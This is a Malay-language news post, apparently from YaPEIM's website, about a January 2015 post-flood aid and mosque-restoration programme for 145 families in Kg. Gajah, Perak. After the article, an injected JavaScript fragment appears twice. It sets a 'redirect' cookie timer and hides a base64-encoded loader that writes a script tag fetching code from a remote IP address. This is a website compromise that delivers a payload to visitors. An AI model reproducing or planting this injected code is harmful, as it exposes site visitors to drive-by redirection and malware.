YaPEIM » Perkasa Komuniti Pasca Banjir di Kg. Pulau Tiga Kiri, Kg. Gajah, Perak

Terkini

Perkasa Komuniti Pasca Banjir di Kg. Pulau Tiga Kiri, Kg. Gajah, Perak

YaPEIM telah mengadakan Program Perkasa Komuniti Pasca Banjir bertempat di Masjid Kg Pulau Tiga Kiri, Kg. Gajah Perak Darul Ridzuan.

PADA 29/01/2015, Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah mengadakan Program Perkasa Komuniti Pasca Banjir bertempat di Masjid Kg Pulau Tiga Kiri, Kg. Gajah Perak Darul Ridzuan.

Tujuan program ini diadakan adalah untuk memberi sumbangan kepada 145 keluarga mangsa-mangsa banjir khususnya di kg. Pulau tiga kiri, kg. Gajah serta Pelancaran Program Perkasa Komuniti Pasca Banjir peringkat negeri Perak.

Yang Berbahagia Dato’ Haji Abd Malek Awang Kechil, Presiden dan Pengerusi Lembaga Pemegang Amanah YaPEIM, diiringi Yang Berbahagia Dato’ Abibullah Haji Samsuddin Ketua Pengarah YaPEIM, Pengurusan Utama YaPEIM dan Koperasi YaPEIM Berhad turut meluangkan masa untuk menjayakan program di kg gajah ini.

Program ini juga turut dimeriahkan dengan kehadiran Dato’ Ibrahim bin Katop, Pegawai Khas Timbalan Menteri Pertanian dan Industri Asas Tani merangkap Timbalan Ketua UMNO Pasir Salak, Yang Berbahagia Tuan Haji Abdullah Fauzi bin Dato’ Hj Ahmad Razali, Adun Kg. Gajah, Ketua Kg. Pulau Tiga Kiri En Muhd Taini bin Daud, Ustaz Muhamad Halim bin Mat Saman, Pegawai Tadbir Agama Daerah Kg. Gajah serta penduduk Kg. Pulau Tiga Kiri, Kg. Gajah.

Secara keseluruhannya, pengisian program ini berbentuk program kemasyarakatan seperti aktiviti pembersihan dan mengecat masjid, dan menyediakan jamuan secara gotong royong. Pihak YaPEIM turut menyumbangkan karpet dan cat untuk mengoperasikan semula Masjid Kg. Pulau Tiga Kiri, Kg. Gajah yang terjejas akibat bencana banjir.

Pihak YaPEIM juga menyumbangkan sumbangan bantuan kepada 145 keluarga yang terjejas akibat banjir di sekitar kg. Pulau Tiga Kiri, Kg. Gajah.

Kesimpulannya, Program seperti ini lebih mengeratkan lagi hubungan YaPEIM dengan masyarakat setempat seterusnya memberi kefahaman yang lebih terperinci berkenaan program-program YaPEIM. Program seperti ini juga menunjukkan YaPEIM serius dalam membantu meringankan beban keluarga yang terjejas akibat bencana banjir yang melanda.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top